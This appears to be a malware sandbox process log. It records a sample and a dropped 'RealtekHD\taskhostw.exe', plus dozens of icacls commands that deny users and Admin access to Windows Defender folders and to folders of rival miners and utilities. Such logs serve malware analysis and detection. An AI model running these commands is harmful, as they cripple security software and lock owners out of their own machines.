C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls C:\programdata\AudioHDriver /deny %username%:(OI)(CI)(F)
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls C:\programdata\windowsdriver /deny %username%:(OI)(CI)(F)
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls C:\Windows\WindowsDefender /deny %username%:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls C:\programdata\DirectX11b /deny Admin:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls C:\programdata\DriversI /deny %username%:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls C:\Programdata\Framework /deny Admin:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls C:\windows\system32\hs /deny %username%:(OI)(CI)(F)
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\SysWOW64\icacls.exe
icacls C:\programdata\system32 /deny Admin:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls C:\windows\rss /deny %username%:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls C:\programdata\AudioHDriver /deny Admin:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls C:\programdata\windowsdriver /deny Admin:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls C:\Windows\WindowsDefender /deny Admin:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls C:\programdata\DriversI /deny Admin:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls C:\windows\system32\hs /deny Admin:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls C:\windows\rss /deny Admin:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls C:\Users\Admin\AppData\Local\generictools /deny %username%:(OI)(CI)(F)
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls C:\Users\Admin\AppData\Local\PCBooster /deny %username%:(OI)(CI)(F)
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls C:\Users\Admin\AppData\Local\unityp /deny %username%:(OI)(CI)(F)
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls C:\Users\Admin\AppData\Local\AMD /deny %username%:(OI)(CI)(F)
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\SysWOW64\icacls.exe
icacls C:\Users\Admin\AppData\Local\generictools /deny Admin:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls C:\Users\Admin\AppData\Local\PCBooster /deny Admin:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls C:\Users\Admin\AppData\Local\unityp /deny Admin:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls C:\Users\Admin\AppData\Local\AMD /deny Admin:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls C:\Users\Admin\AppData\Local\xmarin /deny %username%:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls C:\Users\Admin\AppData\Local\comdev /deny %username%:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls C:\Users\Admin\AppData\Local\wupdate /deny %username%:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls C:\Users\Admin\AppData\Local\monotype /deny %username%:(OI)(CI)(F)
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\SysWOW64\icacls.exe
icacls C:\Users\Admin\AppData\Local\xmarin /deny Admin:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls C:\Users\Admin\AppData\Local\xpon /deny %username%:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls C:\Users\Admin\AppData\Local\comdev /deny Admin:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls C:\Users\Admin\AppData\Local\wupdate /deny Admin:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls C:\Users\Admin\AppData\Local\monotype /deny Admin:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls C:\Users\Admin\AppData\Local\xpon /deny Admin:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls C:\Users\Admin\AppData\Local\wmipr /deny %username%:(OI)(CI)(F)
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls C:\Users\Admin\AppData\Local\kara /deny %username%:(OI)(CI)(F)
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls C:\Users\Admin\AppData\Local\syslog /deny %username%:(OI)(CI)(F)
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls C:\Users\Admin\AppData\Local\temp\wup /deny %username%:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls C:\Users\Admin\AppData\Local\FileSystemDriver /deny %username%:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls C:\Users\Admin\AppData\Local\wmipr /deny Admin:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls C:\Users\Admin\AppData\Local\kara /deny Admin:(OI)(CI)(F)
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\SysWOW64\icacls.exe
icacls C:\Users\Admin\AppData\Local\syslog /deny Admin:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls C:\Users\Admin\AppData\Local\temp\wup /deny Admin:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls C:\Users\Admin\AppData\Local\FileSystemDriver /deny Admin:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls C:\Users\Admin\AppData\Local\geckof /deny %username%:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls C:\Users\Admin\AppData\Local\initwin /deny %username%:(OI)(CI)(F)
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls C:\Users\Admin\AppData\Local\packagest /deny %username%:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls C:\Users\Admin\AppData\Local\geckof /deny Admin:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls C:\Users\Admin\AppData\Local\initwin /deny Admin:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls C:\Users\Admin\AppData\Local\packagest /deny Admin:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls C:\Users\Admin\AppData\Roaming\subdir /deny %username%:(OI)(CI)(F)
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls C:\Users\Admin\AppData\Roaming\syscore /deny %username%:(OI)(CI)(F)
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls C:\Users\Admin\AppData\Roaming\windowscore /deny %username%:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls C:\Users\Admin\AppData\Roaming\Macromedia /deny %username%:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls C:\Users\Admin\AppData\Roaming\microsoft software /deny %username%:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls C:\Users\Admin\AppData\Roaming\subdir /deny Admin:(OI)(CI)(F)
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls C:\Users\Admin\AppData\Roaming\SystemCertificates /deny %username%:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls C:\Users\Admin\AppData\Roaming\microsoft\Speech /deny %username%:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls C:\Users\Admin\AppData\Roaming\coretempapp /deny %username%:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls C:\Users\Admin\AppData\Roaming\syscore /deny Admin:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls C:\Users\Admin\AppData\Roaming\Macromedia /deny Admin:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls C:\Users\Admin\AppData\Roaming\kryptex /deny %username%:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls C:\Users\Admin\AppData\Roaming\windowscore /deny Admin:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls C:\Users\Admin\AppData\Roaming\SystemCertificates /deny Admin:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls C:\Users\Admin\AppData\Roaming\microsoft\Speech /deny Admin:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls C:\Users\Admin\AppData\Roaming\coretempapp /deny Admin:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls C:\Users\Admin\AppData\Roaming\microsoft software /deny Admin:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls C:\Users\Admin\AppData\Roaming\kryptex /deny Admin:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls C:\Users\Admin\AppData\Roaming\system /deny %username%:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls C:\Users\Admin\AppData\Roaming\WindowsApps /deny %username%:(OI)(CI)(F)
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls C:\Users\Admin\AppData\Roaming\WindowsHelper /deny %username%:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls C:\Users\Admin\AppData\Roaming\systemprocess /deny %username%:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls C:\Users\Admin\AppData\Roaming\microsoft\windows defender /deny %username%:(OI)(CI)(F)
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\SysWOW64\icacls.exe
icacls C:\Users\Admin\AppData\Roaming\system /deny Admin:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls C:\Users\Admin\AppData\Roaming\systemprocess /deny %username%:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls C:\Users\Admin\AppData\Roaming\WindowsApps /deny Admin:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls C:\Users\Admin\AppData\Roaming\microsoft\network /deny %username%:(OI)(CI)(F)
C:\Programdata\RealtekHD\taskhostw.exe
C:\Programdata\RealtekHD\taskhostw.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls C:\Users\Admin\AppData\Roaming\gplyra /deny %username%:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls C:\Users\Admin\AppData\Roaming\intel /deny %username%:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls C:\Users\Admin\AppData\Roaming\systemprocess /deny Admin:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls C:\Users\Admin\AppData\Roaming\WindowsHelper /deny Admin:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls C:\Users\Admin\AppData\Roaming\microsoft\windows defender /deny Admin:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls C:\Users\Admin\AppData\Roaming\systemprocess /deny Admin:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls C:\Users\Admin\AppData\Roaming\microsoft\network /deny Admin:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls C:\Users\Admin\AppData\Roaming\intel /deny Admin:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls C:\Users\Admin\AppData\Roaming\gplyra /deny Admin:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls C:\Users\Admin\AppData\Roaming\app /deny %username%:(OI)(CI)(F)
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls C:\Users\Admin\AppData\Roaming\Windows_x64_nheqminer-5c /deny %username%:(OI)(CI)(F)
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls C:\Users\Admin\AppData\Roaming\isminer /deny %username%:(OI)(CI)(F)
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls C:\Users\Admin\AppData\Roaming\systemcare /deny %username%:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls C:\Users\Admin\AppData\Roaming\app /deny Admin:(OI)(CI)(F)
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls C:\Users\Admin\AppData\Roaming\SIVapp /deny %username%:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls C:\Users\Admin\AppData\Roaming\kyubey /deny %username%:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls C:\Users\Admin\AppData\Roaming\Windows_x64_nheqminer-5c /deny Admin:(OI)(CI)(F)
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\SysWOW64\icacls.exe
icacls C:\Users\Admin\AppData\Roaming\isminer /deny Admin:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls C:\Users\Admin\AppData\Roaming\SIVapp /deny Admin:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls C:\Users\Admin\AppData\Roaming\systemcare /deny Admin:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls C:\Users\Admin\AppData\Roaming\kyubey /deny Admin:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls C:\Users\Admin\AppData\Roaming\NSCPUCNMINER /deny %username%:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls C:\Users\Admin\AppData\Roaming\performance /deny %username%:(OI)(CI)(F)
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls C:\Users\Admin\AppData\Roaming\microsoft\windows\system /deny %username%:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls C:\Users\Admin\AppData\Roaming\performance /deny %username%:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls C:\Users\Admin\AppData\Roaming\Sysfiles /deny %username%:(OI)(CI)(F)
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\SysWOW64\icacls.exe
icacls C:\Users\Admin\AppData\Roaming\NSCPUCNMINER /deny Admin:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls C:\Users\Admin\AppData\Roaming\AudioHDriver /deny %username%:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls C:\Users\Admin\AppData\Roaming\performance /deny Admin:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls C:\Users\Admin\AppData\Roaming\microsoft\windows\system /deny Admin:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls C:\Users\Admin\AppData\Roaming\performance /deny Admin:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls C:\Users\Admin\AppData\Roaming\Sysfiles /deny Admin:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls C:\Users\Admin\AppData\Roaming\AudioHDriver /deny Admin:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls C:\Users\Admin\AppData\Roaming\bvhost /deny %username%:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls C:\Users\Admin\AppData\Roaming\GoogleSoftware /deny %username%:(OI)(CI)(F)
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls C:\Users\Admin\AppData\Roaming\setupsk /deny %username%:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls C:\Users\Admin\AppData\Roaming\Svcms /deny %username%:(OI)(CI)(F)
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls C:\Users\Admin\AppData\Roaming\crmsvc /deny %username%:(OI)(CI)(F)
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\SysWOW64\icacls.exe
icacls C:\Users\Admin\AppData\Roaming\GoogleSoftware /deny Admin:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls C:\Users\Admin\AppData\Roaming\bvhost /deny Admin:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls C:\Users\Admin\AppData\Roaming\setupsk /deny Admin:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls C:\Users\Admin\AppData\Roaming\Svcms /deny Admin:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls C:\Users\Admin\AppData\Roaming\crmsvc /deny Admin:(OI)(CI)(F)
C:\Windows\system32\taskmgr.exe
"C:\Windows\system32\taskmgr.exe" /4
C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
C:\Users\Admin\AppData\Local\Temp\bd38e93c22ab359d615e7464fd252363_JaffaCakes118.exe
"C:\Users\Admin\AppData\Local\Temp\bd38e93c22ab359d615e7464fd252363_JaffaCakes118.exe"
C:\Users\Admin\AppData\Local\Temp\bd38e93c22ab359d615e7464fd252363_JaffaCakes118.exe
"C:\Users\Admin\AppData\Local\Temp\bd38e93c22ab359d615e7464fd252363_JaffaCakes118.exe"
C:\Users\Admin\AppData\Local\Temp\bd38e93c22ab359d615e7464fd252363_JaffaCakes118.exe
"C:\Users\Admin\AppData\Local\Temp\bd38e93c22ab359d615e7464fd252363_JaffaCakes118.exe"
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe"
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0xcc,0xd0,0xd4,0xa8,0xd8,0x7ff88c159758,0x7ff88c159768,0x7ff88c159778
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1524 --field-trial-handle=1756,i,14323050312902301359,95519556986410514,131072 /prefetch:2
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1796 --field-trial-handle=1756,i,14323050312902301359,95519556986410514,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2096 --field-trial-handle=1756,i,14323050312902301359,95519556986410514,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --first-renderer-process --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=2840 --field-trial-handle=1756,i,14323050312902301359,95519556986410514,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=2848 --field-trial-handle=1756,i,14323050312902301359,95519556986410514,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe"
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=4060 --field-trial-handle=1756,i,14323050312902301359,95519556986410514,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4628 --field-trial-handle=1756,i,14323050312902301359,95519556986410514,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4736 --field-trial-handle=1756,i,14323050312902301359,95519556986410514,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4776 --field-trial-handle=1756,i,14323050312902301359,95519556986410514,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4636 --field-trial-handle=1756,i,14323050312902301359,95519556986410514,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4880 --field-trial-handle=1756,i,14323050312902301359,95519556986410514,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --mojo-platform-channel-handle=3940 --field-trial-handle=1756,i,14323050312902301359,95519556986410514,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --mojo-platform-channel-handle=5172 --field-trial-handle=1756,i,14323050312902301359,95519556986410514,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5264 --field-trial-handle=1756,i,14323050312902301359,95519556986410514,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --mojo-platform-channel-handle=5260 --field-trial-handle=1756,i,14323050312902301359,95519556986410514,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --mojo-platform-channel-handle=5220 --field-trial-handle=1756,i,14323050312902301359,95519556986410514,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --mojo-platform-channel-handle=5396 --field-trial-handle=1756,i,14323050312902301359,95519556986410514,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=19 --mojo-platform-channel-handle=5392 --field-trial-handle=1756,i,14323050312902301359,95519556986410514,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=20 --mojo-platform-channel-handle=5812 --field-trial-handle=1756,i,14323050312902301359,95519556986410514,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=21 --mojo-platform-channel-handle=5816 --field-trial-handle=1756,i,14323050312902301359,95519556986410514,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=22 --mojo-platform-channel-handle=6104 --field-trial-handle=1756,i,14323050312902301359,95519556986410514,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
